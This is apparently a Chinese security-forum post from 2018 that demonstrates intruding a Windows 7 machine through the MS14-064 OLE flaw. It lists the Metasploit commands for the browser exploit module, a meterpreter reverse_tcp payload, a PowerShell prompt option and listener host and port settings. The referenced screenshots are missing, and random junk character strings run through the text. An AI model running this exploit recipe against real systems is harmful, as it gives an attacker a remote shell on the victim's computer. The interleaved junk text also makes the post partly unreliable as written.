找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1535|回复: 0

MS14-064 漏洞测试入侵win7

[复制链接]
发表于 2018-10-20 20:20:35 | 显示全部楼层 |阅读模式

6 ]% ?+ D. ^- k! b+ j" {$ {2 s 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示6 k1 y% Q% j% p! z( p0 B6 ]! Y" V" D

+ }: J8 @/ D& v' \8 W& D0 [

9 f7 M( R$ D) s: k4 }9 T 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: : r+ Q$ }" C% _$ @+ ]2 a1 O/ F

" [( o6 N. H' F' i+ U7 ^+ h& Q

) G( o9 d+ r& k! F" B: w 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp & l3 n0 ~, O6 R4 {0 }

( ]8 _6 K. A& |! [% r+ h1 B

4 j9 F9 Q) b5 @) U' z0 u: r* a0 f$ k             set AllowPowershellPrompt true L. v1 C0 P1 F0 w8 D; r r

1 L+ H9 P9 F( E8 H, b; e9 g

. v9 N4 W) C. U             Set LHOST 192.168.0.109 $ s! f+ Y# G( h) N

3 \; J& |. G: d% _+ [4 ^) I2 t

* v; q! s0 H @1 Q6 d3 |! }             set SRVHOST 192.168.0.109) e- ^. C# N1 A- z

' S4 @: B8 A8 y3 a( H

8 \/ m% L# G: G G, ?5 k. t             Set uripath share 8 P4 ]# x2 V% L

! d7 a. E1 R. v+ z* Y0 v E) S

/ Y: S0 g2 |8 S1 W6 s             Set srvport 80. {$ S8 a' Z* ^ A

8 p: ~# X) x. v6 m7 p8 M& y

- s7 _: q) Y5 [: O5 K% W4 { e   p6 a [; `# w) G1 ?

1 v- p0 K3 y9 N+ E9 x

! G4 c) u$ b! @' b3 U; Q2 X W  / ?- o! y1 B j3 u# k) H$ W3 @

+ ^9 o2 w4 i) E, B$ \! I6 w

( o: v$ ]: n. a7 K* k   0 Z, ~$ U0 d. j& i' h# C8 i; O

7 ?- N+ ?* B$ \: M5 k) j

6 U8 m6 `- _6 F0 B  ) r' D; w" p% d6 h; R. `- ?2 n

9 C- L- L- H# x2 b, s' I1 M

: @' H* ]* b8 I$ x3 f( e9 R& c  ! o0 u6 U; B* R. }. v) ~ R, B4 j

! W) R- t0 ]6 F0 K w" A

1 S6 @+ J @# y0 e2 ? 下面我们来访问本地地址如图:% v' m- i1 a) m/ p" Y) ]8 ?

! L S3 U) |3 B2 X; |' C1 X

/ {2 L8 r5 A4 O E3 c   0 y* Z& q* Z7 F# M$ G

t/ B0 U5 q' ~) r

5 R0 y8 N9 Z2 W- N* r  7 L, M7 G# E% O( ], [

8 f6 t0 ?1 Q& e) [' J5 e$ B, }

r2 J* L# o7 R v 8 R! l" s( h; M! k5 d

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表